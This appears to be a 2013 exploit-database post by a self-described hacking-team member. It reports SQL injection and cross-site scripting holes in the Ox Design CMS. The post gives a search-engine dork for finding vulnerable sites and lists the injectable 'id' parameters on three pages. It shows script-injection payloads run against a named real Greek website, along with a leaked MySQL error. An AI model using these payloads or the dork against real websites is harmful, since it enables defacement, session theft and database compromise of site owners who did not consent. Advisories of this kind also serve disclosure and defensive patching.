Home / exploits Ox Design Cross Site Scripting / SQL Injection
Posted on 04 September 2013
######################################################################## # 1010101010101010101010101010101010101010101010101 # # 0 __ _ __ 0 # # 1 /'__` /' / 1 # # 0 /\_ __ __ /\_, 0 # # 1 /_/_\_<_ / / \/_/ 1 # # 0 / \ \_/ / \____ 0 # # 1 \____/ \___/ \_ \_____ 1 # # 0 /___/ /__/ /_//_____/ 0 # # 1 1 # # 0 >> Dr.3v1l 0 # # 1 >> 0WebSecurity.IR 1 # # 0 0 # # 1 [+] E-Mail : B.Devils.B@gmail.com 1 # # 0 [+] Y! : Doctor.3v1l 0 # # 1 1 # # 0 ########################################### 0 # # 1 I'm 3v1l member from Black_Devils B0ys Team 1 # # 0 ########################################### 0 # # 1 1 # # 0101010101010101010101010101010101010101010101010 # ######################################################################## # # Exploit Title: Ox Design CMS SQLi/XSS Vulnerabilities # Date: 2013 31 August # Author: Hossein Hezami ( Dr.3v1l ) # Software Link: www.oxdesign.gr # Version: N/A # Category: webapps # Google Keywords: intext:"Powered by Ox Design" and inurl:"/en/company.php?id=" # Tested on: Windows , Linux # ######################################################################## # # [~] Exploit : # # [TARGET]/en/company.php?id=[XSS] # [TARGET]/en/company.php?id=[SQLi] # [TARGET]/en/investors.php?id=[XSS] # [TARGET]/en/investors.php?id=[SQLi] # [TARGET]/en/services.php?id=[XSS] # [TARGET]/en/services.php?id=[SQLi] # ######################################################################## # # [~] Demo : # # www.ippotour.gr/en/company.php?id=2'><script>alert(/Hacked by Dr.3v1l/)</script> # www.ippotour.gr/en/investors.php?id=12'><script>alert(/Hacked by Dr.3v1l/)</script> # www.ippotour.gr/en/services.php?id=6'><script>alert(/Hacked by Dr.3v1l/)</script> # # [~] SQLi Error : # # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''>' at line 1 # ######################################################################## # # [~] Note : # # This Is A Simple SQLi and XSS Vulnerability # Found by Dr.3v1l # ######################################################################## # # [~] Contact Me : # # Teacher.3v1l@live.com # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.LinkedIN.com/in/Hossein3v1l # ########################################################################
